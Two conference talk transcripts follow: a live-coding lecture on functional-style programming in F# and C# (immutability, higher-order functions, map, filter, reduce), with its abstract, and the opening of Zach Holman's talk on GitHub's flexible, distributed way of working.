work with the code. So functional code are much more safer to work with in this particular context. So one of the major problems is the shared mutable state. Now, unfortunately, languages like Java and C Sharp are, it's a common practice to use mutability in code. But better languages actually don't allow you to do that. If you consider a pure functional language, in a pure functional language, you will never be able to modify a variable once you create it. But F Sharp is not a pure functional language. It's a hybrid functional language. It's a hybrid functional language because it allows you to do stuff like you do in C Sharp, more of an imperative style with mutability, but it also allows you to do with functional style of coding if you're interested. So for example, if I were to create a variable called temperature over here, and let's say set the value to maybe a plus and 25 degrees as the weather is mostly this week, and we could then say print out the value of the temperature for me, and I could say here is the temperature value, and sure enough, it is 25. I change the value of temperature, lower it just a little bit to a more comfortable level maybe, and then we want to ask what the temperature is. Again, we can say give me the value of temperature, and as you see, the temperature value did not change at all. Now you're wondering what in the world happened here. And the reason is what really was happening on line number four is not an assignment, but rather a comparison operation that was happening. So for example, if I were to put a print statement before this and ask him what the value in this particular context is, you will notice that it tells me that it is a false, and the reason is that the value of temperature right now is not equal to a value of 15. So as we are used to the equals in language like C-sharp, we kind of look at it like an assignment, but it's really a comparison operation. In other words, variables are unbounded, and the minute they are bounded, you can only compare them. But if you really want mutability, you can do that in C-sharp also, and in F-sharp also, and the way to do that is to really create a variable that allows mutation. But C-sharp wants to shame you a little bit for doing that. So they force you to use a special keyword called mutable, so you kind of hang your head low when you do this, and say, yes, I really am creating a mutable variable. And then of course, you can modify the variable in this context, and then you can say temperature is 15, and you are able to modify the variable in this context using a different syntax in this particular case. So F-sharp really allows mutability, but it is not a preferred way. I like this because it's easy to quickly grep in the code and look for places you are using mutable variables, do a quick code review and say, hey, why can't we rewrite this, refactor this code so that it's more immutable in nature, so it's easier to grasp this than not having a special syntax for this purposes. So mutability is really a critical thing, but what about this purity of functions? So in terms of functional style of programming, I'm going to draw two distinctions here. Imagine drawing two circles, a small circle and a bigger circle, and the small circle, of course, is more encamping. It contains more features. The bigger circle is a little loose and has lesser features. At the outer circle, I'm going to put words like higher order functions, and what that means is you can create functions within functions, return function from functions, and then you can send functions to functions and so on. In other words, you can compose your application using functions. If you draw that outer circle as higher order functions, a lot of languages fit into that outer circle today. For example, F-sharp fits into that outer circle. C-sharp fits into the outer circle today because of lambda expressions. Java 8 will fit into that circle. Groovy, Scala, you know, so many other languages you can think of fit into that outer circle. Erlang, Haskell, Clojure, all of those fit into it. But the inner circle I want to draw is a more restrictive circle where the language enforces purity, and only a few languages come into that inner circle like languages that really enforce purity where you cannot mutate anything at all whatsoever. If that is the inner circle, then I would move F-sharp to the border of that circle and Scala to the border of the circle because those languages do provide a way to enforce immutability, but they also provide mechanisms to break away from them so they're not very pure in that regard. But then language like Erlang has more purity built into them so they clearly fit into this inner circle of very pure functional languages. So in terms of purity, what is the benefit of purity? The benefit of purity like I talked about is the referential transparency. You can reorder functions that will and it becomes easier for really creating concurrent applications. But what about higher order functions? We can create higher order functions in most languages today. Let's start with an example in C-sharp and work with a little bit of an example of higher order function. So let's say I have a list of numbers on hand and this list of numbers is going to be, let's simply say that I'm going to have just a bunch of values given to this. So this is going to be let's say a few values that I can think of here and I want to loop through these values and print these values, pretty common operation, but a very simple operation also. Now we all know one way to do this, right? For int i equal to zero, i less than numbers dot count and this is the part where you have to pause and ask yourselves, is it less than or less than or equal to? That is called a self-inflated wound, right? There is no reason to suffer through those anymore in programming and this is so archaic way of doing it, but sure that's definitely an option available for us and then we can of course print the value in this case and I could say this is going to be the numbers i that I want to print, maybe I'll give a space here and then when we are done with this we'll just give a empty line for it to print the values out. But of course a better way to program this in C sharp is to use a for each statement where we could go through the numbers and right off the bat we can see how lightweight this is relatively speaking and then we could say the number e itself I want to print, no need to mess with the indices values that becomes a lot more easier to work with. But of course you don't have to work through that much effort also in C sharp anymore so you could use more of a higher order function in this case. So you could simply say why not take the numbers and call a for each on it directly where I'm going to receive an element and I'm going to simply ask him to print the value of the element I have on hand and in this case I'm going to print the element e given to me. So if you look at this example here what I'm doing is to use an higher order function but what in the world is on higher order function. Just look at this part for a second we'll get back to this more but to us most of us we could say a function contains four things. A function has a name, a function has a body, a function has a return type and a function has a parameter list. So given a name, a parameter list, a return type and a body we could argue the body is the most important thing in a function. So in this function this is a function we are sending to the for each function so the for each function is considered to be the higher order function and the reason for each is a higher order function is the function says I am really elevating myself not just asking for objects to be sent to me but I'm even willing to accept functions from you so it's really a higher order function that you can pass functions to this function you can return functions from functions you can also create functions within functions as well. Now in this case the for each higher order function is receiving a function and to the right of this arrow is the body of the function you are trying to send to this function. So of the four things I talked about we covered the body what about the parameter list the parameter list is to the left of the arrow right there what about the return type the return type is inferred hey what about the name of this function well what's in the name it's anonymous we don't care to give a name for this function. So the for each function is a higher order function that accepted this function as a parameter and we pass to it and as a result we moved away from what is a traditional external iterator to more of a nice and concise internal iterator. An external iterator is kind of like a root dog in the house it just sits on your mat and you have to ask it to move and every time you have to push it it doesn't want to move a foot right. What is an internal iterator completely relieves the duties from your hands it says I will do the looping you simply tell me what you want to achieve for each of the iterations in the loop. So as a result it's a lot more concise and it takes away the tedious effort and lets you focus on the real essence of what you're trying to do. In a similar way we could use higher order functions in F sharp I'll give you two examples of how we could do this here. So let's say numbers equals a list of numbers I want to create one to six by the way and I want to print these numbers I'm not going to go through a external iteration here well actually let's do that why not. So because F sharp is a hybrid language it allows you to do both ways of doing things but we should have the wisdom to choose the right way to do stuff in this particular context. So you could say for example for element E in numbers and you could ask him to do and you can ask him to print in this case the value of the element itself that you have on hand and when you are done of course I want him to print in this case an empty list for us so that could be an example of how we could print the values using an imperative style and through a traditional looping mechanism we could do that. But we don't have to do coding like that in F sharp a more idiomatic way I think that is the most important thing when you program in languages it's really not about the syntax of a language I mean honestly I could program in about maybe ten different languages comfortably but every language is painful to me as I begin to learn because the syntax never seems to stick into my fingers until I code enough I can't remember those things but learning the syntax is of no use at all because the real essence in a language is not in its syntax but in its idioms. Now think about this for a minute idioms are really the problematic areas but also fun areas also you know I can speak English actually I can speak English barely as my English teacher would like to you know remind me and when I can speak English but I go to different countries and what really tips me a trip me off is when they speak English it's not that I cannot understand the words they speak but I don't know the idioms they speak so I cannot just look up a dictionary and say what are those words mean and when you put the words together it means something absurd and nonsense and definitely doesn't mean what they actually said because idioms are structured based on culture and context and there's always a story behind idioms as they were created so learning the language involves learning the structure and the grammar of the language but also learning the idioms when you learn in a society and normally you learn the idioms in a society when you live in the society for a while and you kind of ask people what does that mean why did you say that in a similar way when you program in a language it's not about the syntax of the language but we have to pick up the idioms how do people who are common in that language program in that language the idiomatic style of the language is important for us to understand so what I'm going to do here is to tell that I want to take the numbers over here and I'm going to call it a rater and to the iterator I'm going to pass the print function and I tell the print function to print over here a element that I want to print but what in the world is this element well you're going to say fun e and the reason why you use fun here is it really is fun to program in f sharp right so that's why you say it's a function that you're defining an anonymous function you are defining and the parameter of this function takes this e and then print is going to print that function and this is going to operate on the numbers collection you are utilizing now that is one way to write the code in f sharp but you don't have to put that much effort in f sharp to do this you could also do the same thing by calling it a rater and you can simply specify here the print function itself over here if you will and you can tell him I want to simply print the variables I have on hand for whatever the variable given to me from the numbers over here and you can see that he's able to print that right here off the bat without us having to do any extra work so you can see that in this particular case the print function knows that it needs two parameters and it also knows that the second parameter is really going to be passed through from the parameter this is anonymous function is receiving so f sharp really saves a bit of an effort on your shoulders it says you don't have to write a stupid code that just simply receives a parameter only to pass it down the chain I will do the job for you you just take it of the other parameters needed in this particular function in a similar way if this function were to take two parameters but those really are what you receive as parameters you can completely drop the parameters and just drop the function name in there and it will receive the parameters and chain it through so it really saves the effort you are not really writing useless code and you can just focus on the most important code you want to write so that is an example of the code in f sharp using higher order functions and a more of a dramatic style of writing this code by the way I'm writing a quite a bit of code here you can download the code from my website later on if you are interested and you can play with it the fun about you know code is you can work with it break it change it evolve it certainly you can download it anytime you want to from that website so I'm talking about the functional style the higher order functions here quite a bit but how does this really map over to an imperative versus a functional style of coding so let's take a look at two examples of this let's first look at C sharp for a minute imagine for a minute you are given the task of doubling each of the numbers given to you so that's what you've been asked to do so how would you double the values in the list in a traditional C sharp code so it looks something like this right you say list integer doubled but it's really doubled boring way of doing it right because we've done this before and equals to new list of integer and then what do you do after this you say for element e in numbers and then you say double the boring dot add e times two and when you are done with it you can say element in double the boring and then you can print out the value at this point and you can say this is going to be the value in the element that you want to print and then you can specify the value that you have printed so far so that is basically the code that is going to loop through and print the values in this particular collection now look at this example for a second what did I do wrong anybody sees what the problem is at the end I'm missing a curly brace at the very end that would actually helps to put it thank you for debugging that I should have stayed with that error it was fewer errors okay so what's the problem now for each thank you so so there another for each of course are we done with this alright so right there that was a lot of code to write no wonder there's more mistakes to make over there right by the way we all have done code like this right yeah how do you feel about this code when you write it you feel dirty don't you you don't feel energetic you go home what do you say you say don't touch me I have to shower first right and you feel like you have to cleanse yourself before you go home right because that is so you know boring code to write doesn't have any useful stuff other than one little logic hidden somewhere deep in there we shouldn't be writing code like that why don't we try something a little differently let's kind of comment that out for a second and let's simply say hey why not simply say output for me well what a well actually let's create a collection right now so we could say list integer doubled equals and let's simply say at this point the double the value is going to be numbers dot select well what do I want to select given an element that is given to me I want to select an element times two as a parameter so far each of the elements bar e in doubled now I can simply print out the value of the element given to me so we could use an internal iterator as well but the essence really in this particular case really is looking at the select statement itself that we are really interested in working through in this particular code example right so basically what we are doing here is asking him to loop through up let me make sure I didn't comment out more than I should comment out that should really be down here so let's put that here let me get rid of this for a second so so right there is the list okay let's try this one more time so list of integer I want to create doubled equals and I want to simply say in this particular case the numbers dot select and what do I want to select with this given an element e I'm interested in returning an e times two that's what I'm really interested in selecting at this particular point and of course he's complaining I can't put into a list over here it's an enum that I'm getting an enumeration I'm getting so now I can say for each of the elements e in doubled I can simply ask him to print the value out which is going to be the element in this particular case so you can see how we can use more of a imperative style versus a functional style that you saw in the bottom to really do the operation in the case of F sharp in a similar way you can do this in C sharp rather in a similar way you can do this in F sharp as well we already have the numbers on hand but I want to really perform this operation but really think about this if you have a collection of data coming in you're applying certain operation on each of the elements but they are pretty much independent of each other and the output you get is a computation applied on the input there is really no mutability involved in this context you get a series of input and you get a series of output it nicely flows through this so in that regard I can simply say here I want to simply print in this case the object I have on hand and the object I have I have on hand is numbers dot map and what do I want to do the mapping for given an element return to me e times two that's what the mapping I want to apply and this is going to be on the list dot map and it's going to apply on the numbers that's given to me on hand that's the operation I want to perform so you can see how it's able to apply this operation on each of the elements so you are saying given this particular numbers object I want you to transform that numbers object using this transformational function so it's a mapping of input to an output if you are in doubt at this point you can look at for example the original numbers object given to you and you will notice that the original object has been untainted because it's completely immutable and sitting nicely in the memory we didn't mess with it so you can see how concise this operation is when you are trying to perform this in a imperative style versus a functional style of coding just becomes a lot easier to work with now we can take this further and operate on several other things you say okay Venkat that was kind of simple you really took over this particular value and applied this on function on these values and then you got a result no big deal but what if you really had to perform a mutation in your code for example let's say I want to total the age of everybody in this room and how would I total the age of everybody in this room I'm going to put a zero on the wall here and say everybody come over here and add your age to the number on the wall now I have to police and make sure everybody falls in a line nobody tries to run over here together I got to worry about synchronization issue and all of that right but let's try to do this a little differently and the way we are going to do this is imagine for a minute that I'm going to ask everybody here to total the age of everybody in this room collectively we're going to work together and we're going to start with this gentleman over here well he's not laughing he's kind of grim at this point no I'm not going to ask for your real age that's okay so the way we're going to do this is the following imagine I have a special post it note this post this post it note is special in that it's a right once post it notes you cannot rewrite on it you cannot erase what's there you cannot change what's there so that's pretty much a done deal once you write once on it so I'm going to put a zero on this post it note and I'm going to give it to you what's your name sir Mohammed is going to get that post in note from he and he sees a value of zero because zero is the age of everybody to his left right now and he's going to take his own age and he's going to total to the value of zero so he's got his age in his mind but he has to pass it to what's your name sir even he's going to pass it to either how is how is that going to happen because he's not allowed to change this right what are his options he could create a new one isn't it so this is a moment for me one day one of the things that is very beneficial to have for functional programming is automatic garbage collection can you imagine writing functional code in C++ every few lines you have to put a delete that would suck right so in this case Mohammed doesn't care about this he takes this post it with a zero totals his age to it creates a new post it note sends it down the chain and discards it makes sense let's put that in code and see how that's going to work let's do this in a imperative style first in a style you don't want to do first so we can compare it and see how this works imagine the numbers are the ones I want a total so I'm going to say let total equal to zero but I cannot change the value of total right so how do we really make sure I can change this value of total what should I do I have to shame myself first that's correct right so I have to say mutable followed by putting my head down right yes I created a mutable variable that's what I did all right then I say for element e in numbers I can say total is equal to the total value past value plus the element so when we are done with that we can say total is and we could specify the value of total that we have on hand that is a imperative style of coding isn't it so we are simply asking him to run through the total so total is equal to zero let's see where the error comes from numbers equal to so what's he complaining about line number four he's not happy do so right there is numbers do and ask him to run through it so right there is total is 21 but that's an imperative style of coding right that's what we are doing asking him to loop through and mutate the variable continuously but we're going to write this code in a way not a single variable is tortured right are mutated in the code how could we possibly do that so I'm going to use a special function I'm going to say in this case let total you know let's call this total mutable for lack of you know to make it really obvious that we created a mutable variable right so that's a total mutable that we used and now I'm going to create in this case total mutable there we go and in this case what I'm going to do is to use a let total equals but what is this value really going to be equal to list it out reduce so reduce is a function I'm going to use where the reduce function says given a collection I'm going to reduce it to a single value but how am I going to reduce it so what the reduce function we talked about internal iterators before this is a special internal iterator the for each we talked about or the Iter we talked about simply applies the function to each of the elements in the collection that's all it does but reduce is special it is an iterator alright but what it does is it it starts with the collection given to it and says I'm going to take the first two elements apply the operation get a result and then I'm going to move to the next element take the result and the next element apply the operation get the result move to the next element apply this result and the next element again so it kind of cascades through and the last operation it performs the result it gets it says oh there's no more element here you go and use you the result at that point this is kind of like you passing the value down the chain and what I get back over here in the very end is the age of everybody in this row now imagine what the beauty of this is I could start with him here and we could pass the immutable posted notes along the way and finally the gentleman up there is going to give me the age of everybody in the room which will be some value or an overflow no I'm just kidding right so it'll be some value right that's one way to do it but that's a sequential way of doing it but on the other hand we could do this a little differently we could say let each person in each of the row on the first streets seats start this so we can go in parallel now and everybody is totaling in each of the row and the people on the last you know seat in each of the row have one additional responsibility they have to pass the posted notes up the chain now we can finish this in as many rows as there are that less time right because we are doing it concurrently and then we can do it sequentially that operation there would be the reduced operation where we take all these set of data and we shrink it back to one value in the very end so how would this really look like so the reduced function is going to work with numbers collection but what's the operation we want to perform here I want to perform the operation of add it so what in the world is added so add it is going to be a function I want to create which takes a two numbers and one and and two as parameters and what does it do returns and one plus and two as the value for it that's all I'm going to do right so all that added method does is it simply or you can call it add to if you want to doesn't matter right so we'll call it add to so add to is a function that is going to take number one and number two and simply add them so the add to function is going to just add through the values and notice in this particular case when I finish this I ask him total is and percent D in this case total and he's going to tell me what the total is and they better be the same value so we can see how we applied the reduced method to do the same operation but we did not modify a single variable in this context how in the world did this do the job the way it did it is the reduced method says I'm going to take the numbers given to me I'm going to take the first two elements call the add to method it gives me a result I'm going to then take the result and the third element and call add to take the result and the fourth element call add to take the result and the fifth element call add to and continue along the way until I finish the elements and give you the result on hand so that is the pure immutable approach to go through the exercise of doing what we did earlier with full mutability at this point so we can see how we could even remove mutability from code quite a bit along the way but the real point of all of this really is not about removing mutability but it is really about state transformation so what does that really mean so if you ask me how do you build an application where nothing changes I would say that's very simple it starts with the main with the curly bracket open immediately ends where nothing changes right well of course something has to change in the system for things to take effect but it really is a rethinking of the way we design software in a way we have designed software and object under programming Alan keys who coined the term oh really didn't mean it to kind of shape of the way it did but kind of the languages like C++ and Java and C sharp kind of drove it along one direction which is to take objects and beat on it and keep mutating it that's really a not a yeah that's one way to develop software but it doesn't have to be the way to develop software so let's think about this a little bit how this would work so I'm going to ask Mohammed Mohammed's help again one more time let's say for a minute I have with me 10 Kronos and I need a change for it right I want to you know ask him to split it into two I give it to Mohammed and say Mohammed could you do me a favor could you please split this 10 Kronos into two and if he stands up and tears it into two pieces I'll be very unhappy with them right because when I asked him to split it I didn't ask him to tear it into two pieces what is he going to do he's going to take the money I give put it in his pocket and then take two five you know dollars five bills and give it to me that's what he's going to do right or if he doesn't have it he's going to take some of the change he has send it to the person next to him and say hey do you have some more change for these nominations and even truly I get something so if you look at a dollar bill or a currency that's a great example we convert currencies not by tearing them into pieces we convert currencies by receiving some and creating some and and really transform the states as we go through and some agencies of course take money as they transform it like I lost some money along the way when I had to convert my dollar bills to a Kronos along the way right so it's a transformational approach so think about a functional programming rather than looking at a system as state mules mutation look at a system as a state transformation go ahead please yes so so his question was this was a simple example we looked at but what if we have to take a number and summit and then take a product out of it and then continue along with it can you give an example of it right so yeah so if you want to really manipulate various different values in the collection can you look at an example of that I'll create an example in a few minutes of going through a set of transformation from that you should be able to extrapolate and see how you will be able to apply that so we'll come back and then I'll check back with you to see if that example was enough for you otherwise we can take it offline and we can create an example which will be a little bit more intricate absolutely but the example I'm going to give you should give you an example idea about how we can achieve that so so stay with me for a few minutes to look at that so so think about this not as a state mutation or a state modification but more of a state transformation along the way so it's no surprise that f sharp and more so functional programming languages like scholar and Erlang and stuff like that are really being used more in a financial industry because they seem to have gotten a good handle on this where they receive some data and then they go through these transformations to really make decisions so there's a nice transformational logic in place of holding those in how do we apply some of those I want to give you an example of that here but before I go to that example I'll give you two examples here let's say for a minute I really want to I'll give you two examples one with these numbers then I'll create a little bit more realistic example after that so let's say for a minute and this kind of goes into something that you talked about I want to take only even numbers and double them and total them right that's what I want to do so take a take only even numbers and then double them and then total them if you really want to do some other operation after that sure you can just pass the list along the way and you can achieve that if you want to so let's start with a little bit of a baby step and then I'll combine it together so let's say for a minute let even only equals numbers dot filter so I'm going to take this collection we looked at a map function a few minutes ago what does the map do maps is given this input create an output of the same size but the operation has been applied on each element filter is different given an element of this collection create me a smaller potentially set of collection it's kind of like a cone operation rather than a cylinder operation you're reducing it to a smaller subset it could be zero or it could be the same number or anything in between those two values right so filter it what is the function I want to apply for this the function I want to apply is E is actually even so we could say give me a element where the element is actually an even number right so you can apply this filter operation on him and then you're telling him on what do you want to apply I want to apply this on numbers if you will right so you're asking him to apply the filter operation on the numbers in this particular case and and he says I'm going to loop through these and what does the filter say filter says I'm going to call a function which is going to yield a Boolean result and as long as the result is a true I will accept this member if the result is a false I will reject this number given to me that is what this is going to do in this particular case so so that is all we are asking him to do at this particular point and and then what do I do I want to print this particular function that we created so I'm going to just ask him to print the even only numbers that were created by by this particular operation so not sure exactly what the error in this particular case is let's take a look at the error result that's giving here six warning possible so he's giving us a bit of a warning let's run through it and see if the result is still produced oh that was actually a error so let me lower the font and look at the error here but bear with me for a second oh of course my mind doesn't switch between languages so quickly it's got to be list filter you are correct absolutely correct this is where when you flip between languages your brain doesn't follow through and the fingers doesn't respond automatically alright so in in C sharp you would say collection dot something right whereas in F sharp you call a static function on it so my brain doesn't switch so easily thank you for the help so right there we call the list dot filter now I have an even numbers only that makes sense right but I want to double these values how do I do that so let doubled equals and then we could say list dot map and here is the function I want to create and it returns an element times two and what is the collection I'm going to work with it is the even only that I want to work with so now I can print the double the values here so we'll call it doubled so this is going to be a double of each of the values but I want to total the numbers together remember so we could say totaled and what is this now let total the equals list dot reduce method that we created a few minutes ago and now what does the reduce do it takes two numbers right and one and two as parameters returns and one plus and two as a value and what is he working on on doubled obviously in this case and he's going to give us a total of the values of even numbers doubled and you can see the result being produced at this point is the double of those values but I don't have to go through this much effort to do this as you will see here in just a second so notice how I'm going to rewrite this in a different way so let's go ahead and comment this out for a second so we can see the difference how this looks when we are done with it so let's first start with numbers and I want to write print all the numbers out so I'm going to apply a function composition operation and I'm going to say list dot I turn and what do I want to do in the iteration in the iteration I want to simply print the function and I want to print each of the elements in the collection and that is all I'm going to do here is print the numbers but I really don't want to print the numbers remember I want to print the total of the double of the even numbers so let's get the even numbers first so the next operation I perform here is over here is a list and list dot what should I apply of course the filter operation what is the function function is nothing but the E mod 2 is equal to 0 is the function I want to apply and notice how he is able to filter the even numbers out and print it nice flow functional transformation happening here so the numbers that you send here is passed as a parameter here for you and the result of that is passes a parameter here for you and it just flows through this context very nicely but I really want to reduce this but only after I double the values so list dot map and the function I want to apply here is going to be e times 2 is the mapping I want to apply those values are mapped already now I want to take this value one more time and this time I want to reduce the values and the reduce value is going to be a function which takes a number one and number two and I want him to do n1 plus n2 as an operation or if you had written an add to function you can simply put the word add to right there and end of story we'll do that in a second after we finish this to see how that's going to look like so in this example the list dot reduce is going to take the result of this operation and the function is going to take n1 and n2 and he is going to return n1 plus n2 as a result let's see what the error here is int is it's a list that we are sending back to him there's a type mismatch let's see what the type mismatch is coming from 19 ah so in this case he's complaining it's no longer an iterator right because we reduce it to a single value so this is going to be a print f of the total value that we got eventually so we could just say print that value we could even say print in this case we could say you know something like print line so print fn and what are we going to print here so we could say this is going to be total is and then we could print the total value that we want to print out so that is going to be the last result to pass to him ah he's print fn sorry so that's the total value we want to print at the very end and the same result as the previous time as you can see in this particular case so so the point really is you don't have to go through the steps and store these temporary values but you certainly can so my recommendation to you is start with the code in the top right and if you have to apply these successive transformations build these intermediate results make that code work I'm a huge fan of this mantra make it work make it better so first make it work write those series of transformations once you know what transformations you have to apply then see if you can just compose them as a sequence of operations and then put together and and and if you can't figure that out we can talk offline right after or just drop me an email and we can definitely go into it but but what you're saying seems to be simply fitting into one of these combinations right so just right again to spend some time thinking about it right and see how you can apply it if you can't ping me and we can definitely take a look at it but but I still feel that what you're trying to do is going to fit into one of these paradigm excellent question I was waiting for you to ask that question thank you for asking that so certainly you're looking at this and saying okay this is all cool but darn it how in the world is memory going to shine in this particular case absolutely that's a big concern there are two answers to it one is yes it's going to have a bigger demand on memory but there are ways to avoid that one way to avoid that is you cleverly use data structures that help you with it one is you try to perform operation on the head of list so you don't have to mutate a list to add elements to the list itself and and so you can keep the list immutable but it can keep adding elements to the head by concatenating new references to it so that is one way to solve it the other way to solve it is there are some data structures that have been introduced recently one of them is called tries TRIES and tries is a immutable collection which is a is a very high branching factor tree structure and you can support for example a tree structure with 32 or more children and Phil Bagwell introduced tries and Richie Kee who introduced closure uses tries with immutable collections with enclosure supported in Scala also today so when you're programming in functional languages you would end up using more of these immutable data structures that will ease the demand on memory usage because they will selectively make copies of the data structure rather than making copies of the entire collection so your point is well taken you don't want to use traditional data structures to program functional style of code you want to use more functional data structures to do that and then that you get a better performance in memory so take a look at tries and related data structures and then you can begin to use some of those so let's see how we could put this to a slightly different use I'm going to go to Yahoo and ask for some financial data and the way I'm going to do that is is to write a little code here you can see not too hard what I'm doing here is to call a get price method it takes a ticker name as a parameter create a web client download the data from the web and get the data and parse through it and simply get the price of that but this is going to be a bit slow to run so I'm going to for a few minutes mark it away and then simply return a stale value for us I'll simply say if the ticker is equal to Apple then return five us let's say $600 otherwise return $22 so that's my my mark the way we'll eventually remove that once we get the code to work otherwise I'm going to waste my time waiting for the web to respond with the connection here I don't even know how fast the connection is I've got some tickers on hand let's see how we can apply this so here's my task on hand get the top stock less than $500 right so that's what I want to do I want to get the top stock less than $500 let's build this in steps so tickers and I want to simply print out the tickers value that I get from this so how would I do that so let's go ahead and simply say all that I want to do is to print out so print function here an object I want to print and what's the object I want to print just the tickers so very trivial so far right it's going to just print the values I've been given in the stickers themselves that's all I'm going to do so so let's try this let me get this back to you so let's remove this for a second let's get this code to work first oh I know why so let's okay so there we go so we are asking the ticker symbols to be printed alright now what's the problem in this code I want him to get me the tickers if the ticker not tickers tickers there we go alright cool so the next step of course is I want the tickers and the prices is in it so let's ask that apply process so I can say list dot map a function with a ticker symbol what's he going to do oh gosh I have a ticker on hand but I need a collection of tickers and prices what kind of data structure could I use for that it's a collection alright the collection of what one of my favorite data structures is a tuple right some people call it tuple but a tuple so what's a tuple tuple is just a collection of data very lightweight immutable so here's a tuple the ticker symbol itself and what is the next thing I want to put here the get price for the ticker so that is basically a simple call to it notice the apple is 600 in the market value everything else is 22.22 so we got the prices now I have a collection notice I transformation I transform from a collection of tickers to a collection of tickers and prices make sense alright so then what I what am I going to do well I want to filter now and what do I want to filter filter on a function this takes a ticker price as a value a tuple right and what's he going to do well I want to filter only prices less than 500 meaning I'm going to drop apple from this right so how would this work so say second value from the ticker price is less than 500 so I'm telling him go to the second price and if the second entry in the tuple is the price is less than 500 grab it otherwise rejected notice apple got dropped everything else is in here what's the next thing I want to do okay I have all the stocks which are less than 500 but I want to pick the one that is the highest price what kind of operation could I perform for that to take from all of these and get one out of it a reduce absolutely so a list dot reduce and I'm going to take a function this takes a price one and a price two and what is this going to do if the second off if the second off TP one is greater than the second off TP two then give me TP one else give me the total price the ticker price off to so that is going to give me one of those but of course that's all marked up data let's go remove this from here and run it with the real code and it's going to the web right now asking for the data and this takes anywhere from 20 seconds to three days to run and so we can kind of wait for it to run while it's waiting let's talk about what we have done so far so notice this example we have a collection of ticker symbols we are going out to yahoo grabbing all the price values then we are applying a filtering on it then we are applying a reduction on it then we are saying here's the value that you're expecting and the value right there is Q com as of yesterday $58 in price so that is an example of how we can use more functional style of coding to transform the data so notice it's a state transformational logic rather than a state mutational logic that you're applying in this particular example and you're able to achieve the result so I hope that gives you an idea about what this can do in terms of the style of programming it is a shift in paradigm it is a way for us to redesign and rethink how we develop software but it's definitely a very exciting way to do stuff this really has a bearing on our ability to develop code with more efficiency in terms of correctness and also with multi-core processors it really becomes useful I haven't quite gotten into the multi-core efficiencies but that's all I can cover for what we have on hand right now so I hope that was really useful for you thank you very much for your time. Could you pick a few things? Thank you very much.
|
Functional Programming has been around for a while, but it is gaining popularity, especially due to direct support in languages on the JVM and the CLR. Writing code in functional style is not about syntax. It is a paradigm shift. In this presentation, using examples from F# and C#, you will learn how to write code in functional style. We will start out discussing the elements of functional programming and then look at examples of some common operations and how you can implement those in functional style. Thinking in Functional Style using F# and (some) C#Functional Programming has been around for a while, but it is gaining popularity, especially due to direct support in languages on the JVM and the CLR. Writing code in functional style is not about syntax. It is a paradigm shift. In this presentation, using examples from F# and C#, you will learn how to write code in functional style. We will start out discussing the elements of functional programming and then look at examples of some common operations and how you can implement those in functional style.
|
10.5446/50996 (DOI)
|
I want to apologize, first off, I got to Oslo and then went to sleep. No phones, please. I'm just kidding. I went to sleep and then I woke up immediately with some sort of illness that I don't know the name to. I'm going to liken it to death. So I was basically experiencing death for the last two or three days in my hotel room. And this is the first time I've gotten out of my hotel room, so I'm very excited about that. Which could be great for you if I die on stage, then this will be a conference you'll never forget. So first, I just have a story to tell you. And the story begins with four founders. And these four founders are in a coffee shop, or in a bar, a restaurant, a plane, wherever the case may be, they're somewhere. And the point is that, I mean, they had no office. They had no physical presence where they could go meet and work on this company that they founded. And two of them had other full-time jobs where they had to bring in the bacon and, you know, concentrate on that job full-time. And on top of that, all these founders like to talk. They like to travel. They like to go all over the place. So they weren't even in the same city, much less the same neighborhood or anything like that. All of that was the start of GitHub. And from the beginning, we were forced to be really distributed because everyone was all over the place. We were supposed to be very flexible because they wouldn't have done this if they couldn't come up with a really flexible way of doing it. And we were supposed to be very happy because they would not have done all this stuff and jumped through all this hoop unless they were really happy doing it. Turns out this is a really great way to work. And this is how we've worked ever since then. This talk is kind of about GitHub because I like seeing examples of how people work. But this talk is much more about improving your own company. I think this will work from anyone from the size of one person to 10,000. There's always some level that you have personal change on. Your team, how can you change your team even if you're a low-level employee to some CEO? I think that's really important to try and figure out how you can make better choices and how you can work better. So I'm Zach Holman. I'm Holman on Twitter, Holman on GitHub. And I do work for GitHub. It's a cute little company. If you guys don't know, we are the largest Git host online. We are the largest subversion host because we host subversion for all of our repositories. So we are the largest code host online. And all of this talk sort of stemmed from this three-part series I did last year called How GitHub Works. So if you're interested in reading stuff instead, you can get up and ignore my talk completely and read it. But if you want to hear me talk, that's cool. And I'll start talking now. And I first want to talk about hours. And I think hours are kind of bullshit. But in other words, this whole concept of a nine to five day is really horrible for our industry. You go way back when where you have to drag yourself to work at a particular time and leave at a particular time. That may work for other places, but for us, I don't think that really works. And I think it's harmful to think that it does. Crafting code is a really creative endeavor. We like to think that code is very logical, is very straightforward, and you just have to puzzle it out. And that's not the case. A lot of times you just have to sit down and really figure out what is the creative approach to this where it can come up with the most efficient code, the most crafty code, and the best code that will last into the future. And that doesn't really happen if you're just sitting down and forcing yourself to fix a problem. You can't force creativity to happen during any sort of normal work hours. It sort of happens when you're best prepared to address your creativity. So for us, I think the best solutions happen when you're in the zone. Whatever you want to define that is, anytime you can sort of sit down and say, yeah, I'm totally in the zone. Code is sort of flowing from my fingertips. I'm doing really good decisions here. That's where I want to be every time. And it's really hard to sort of force that to happen at a certain point. So our office is filled with lots of different people. It's filled with early birds. We get in the office at like 7 in the morning, allegedly. I don't see them because I definitely don't get in the morning that early. Night owls more like me. I'll stay later into the night because that's when I work better. Nine to fivers because that works better for their scheduler. Lots of international employees. People all over the place. And then people like what I'm doing right now, traveling employees. So between all of these, we don't really have a set office hour. And I think that's really important because we're able to embrace flexibility. We're able to embrace what somebody thinks is their concept of a really good way of working. A couple of years ago, we made these shirts called 90 Hours a Week in Loving It. Like Apple did back in the... I'm totally just kidding. We did not make these shirts. I think this is horrible. I think that our industry likes to say that like, yeah, I worked overnight last night and this is great. And I think that's horrible. I think it's a badge of foolishness for people to say that like, yeah, our team came together and did thousands of hours last month. It doesn't make any sense to me. I've done all the all-nighters at different companies. I've done the long hours. I've done all that stuff and it's almost always a bad idea. I come back from it and I realize that like it's totally draining me mentally. The code I've produced is much worse and it impacts future code because now you have this code that you've written and you think that it's okay, but you don't want to take it out and refactor it because you'll never get to the point where you want to refactor that stuff and it's just, it's horrible. It comes to a much more bad situation to be in. So that's sort of the crux of what we end up doing. We let people who work at get up work wherever they want and whenever they want. Because again, we want to get people to that zone in their minds where they're really creative, where they're really productive. And that's what we care about much less than core hours or anything like that. Because we just want to get the best work out of employees. That should be what you're looking at more than anything else that you do. That happens when they're happy, that happens when they're fresh and that happens when they're creative. And everything I'm going to talk about today sort of attacks that sentence. Like how many things can we do to support that? How many things can we do to come out of that? Alongside that, especially on the happy side of things, there's something that most of our industry tends to forget. And that's families. I don't understand why people forget this. Get up is no different. We have tons of different families. We 